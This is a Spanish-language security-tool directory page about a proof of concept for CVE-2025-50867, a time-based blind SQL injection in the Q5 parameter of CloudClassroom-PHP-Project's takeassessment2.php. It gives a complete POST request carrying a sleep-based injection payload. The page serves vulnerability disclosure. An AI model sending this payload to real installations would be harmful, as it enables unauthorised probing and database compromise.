Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-50867 — Prueba de concepto de una vulnerabilidad de inyección SQL ciega basada en tiempo en el endpoint takeassessment2.php de CloudClassroom-PHP-Project 1.0, que demuestra la explotación remota mediante una solicitud POST manipulada. | Kitploit
Herramientas/GitHubGitHub/sacx-7/cve-2025-50867
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubsacx-7/cve-2025-50867

CVE-2025-50867

Prueba de concepto de una vulnerabilidad de inyección SQL ciega basada en tiempo en el endpoint takeassessment2.php de CloudClassroom-PHP-Project 1.0, que demuestra la explotación remota mediante una solicitud POST manipulada.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Existe una vulnerabilidad de inyección SQL en el endpoint takeassessment2.php de CloudClassroom-PHP-Project 1.0, donde el parámetro POST Q5 se inserta directamente en sentencias SQL sin desinfección.


Tipo de Vulnerabilidad :

Inyección SQL


Proveedor del Producto :

https://github.com/mathurvishal/CloudClassroom-PHP-Project


Código Base del Producto Afectado :

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0


Componente Afectado :

takeassessment2.php, parámetro POST Q5, lógica de consulta SQL


Tipo de Ataque : Remoto

Vectores de Ataque :

Para explotar esta vulnerabilidad, un atacante envía una solicitud POST maliciosa a /CloudClassroom-PHP-Project-master/takeassessment2.php con un payload en el parámetro Q5 que provoca un retardo de tiempo en el procesamiento SQL (SQLi ciega basada en tiempo).

Solicitud POST:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Esto provoca un retardo de 6 segundos en la respuesta, confirmando la vulnerabilidad.


Referencia :

https://owasp.org/www-community/attacks/SQL_Injection


Descubridor : saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

Descargar herramienta